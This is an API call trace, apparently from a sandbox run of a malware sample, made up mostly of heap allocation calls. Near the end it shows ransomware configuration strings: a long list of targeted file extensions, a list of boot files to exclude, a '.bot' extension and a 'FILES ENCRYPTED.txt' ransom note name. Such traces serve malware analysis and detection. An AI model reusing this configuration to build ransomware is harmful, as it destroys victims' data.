	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44fb8
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b44fd0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44fe8
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45000
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f690
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45018
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45030
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45048
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7b42ce0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45060
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45078
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b42cf0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45090
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b450a8
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b450c0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b450d8
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b450f0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45108
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b45120
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45138
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b45150
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45168
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45180
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b45198
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b451b0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b42d00
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b451c8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b451e0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69570
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69588
	[0136.761] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x200) returned 0x7b447f0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b695a0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b69970
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b695b8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b695d0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b695e8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69600
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69618
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69630
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69648
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69660
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69678
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69690
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b696a8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b696c0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b696d8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b696f0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69708
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69720
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69738
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69750
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69768
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69780
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69798
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b69980
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b697b0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b697c8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b697e0
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b69990
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b697f8
	[0136.761] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69810
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69828
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69840
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69858
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69870
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69888
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b698a0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b698b8
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b698d0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b698e8
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69900
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69918
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69930
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69d70
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69d88
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69da0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69db8
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69dd0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69de8
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69e00
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b699a0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7b699b0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69e18
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69e30
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69e48
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69e60
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69e78
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69e90
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69ea8
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69ec0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69ed8
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69ef0
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69f08
	[0136.762] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69f20
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69f38
	[0136.763] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x400) returned 0x7b447f0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69f50
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69f68
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69f80
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69f98
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69fb0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69fc8
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b69fe0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b69ff8
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a010
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a028
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b699c0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a040
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a058
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a070
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a088
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a0a0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a0b8
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b6a0d0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a0e8
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a100
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a118
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a130
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a170
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a188
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a1a0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a1b8
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b699d0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a1d0
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a1e8
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a200
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a218
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a230
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a248
	[0136.763] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a260
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a278
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a290
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b6a2a8
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a2c0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b6a2d8
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a2f0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a308
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a320
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a338
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a350
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a368
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a380
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a398
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a3b0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a3c8
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a3e0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a3f8
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a410
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a428
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a440
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a458
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a470
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a488
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a4a0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a4b8
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a4d0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a4e8
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a500
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b6a518
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x12) returned 0x7b41c88
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a530
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a570
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a588
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a5a0
	[0136.764] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a5b8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a5d0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a5e8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a600
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a618
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a630
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a648
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a660
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a678
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a690
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a6a8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a6c0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a6d8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a6f0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a708
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a720
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a738
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a750
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a768
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b6a780
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a798
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b699e0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a7b0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b699f0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a7c8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a7e0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a7f8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a810
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a828
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a840
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a858
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a870
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a888
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a8a0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a8b8
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a8d0
	[0136.765] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b6a8e8
	[0136.766] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a900
	[0136.766] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b69a00
	[0136.766] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a918
	[0136.766] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b6a930
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x800) returned 0x7b6ad58
	[0136.766] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776
	[0136.766] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58548 | out: hHeap=0x7ab0000) returned 1
	[0136.766] lstrlenW (lpString="") returned 0
	[0136.766] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b6f8 | out: hHeap=0x7ab0000) returned 1
	[0136.766] lstrlenW (lpString=".bot") returned 4
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f710, Size=0x8) returned 0x7b1f710
	[0136.766] lstrlenW (lpString=".bot") returned 4
	[0136.766] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b6f8 | out: hHeap=0x7ab0000) returned 1
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b728, Size=0x20) returned 0x7b1fd48
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd48, Size=0x40) returned 0x7b20330
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20330, Size=0x80) returned 0x7b46540
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69a70, Size=0x8) returned 0x7b69a80
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69a80, Size=0x10) returned 0x7b6b728
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b728, Size=0x20) returned 0x7b1fd20
	[0136.766] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48
	[0136.766] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46540 | out: hHeap=0x7ab0000) returned 1
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b758, Size=0x20) returned 0x7b200b8
	[0136.766] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b200b8, Size=0x40) returned 0x7b20330
	[0136.766] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0136.767] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0136.767] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b20330 | out: hHeap=0x7ab0000) returned 1
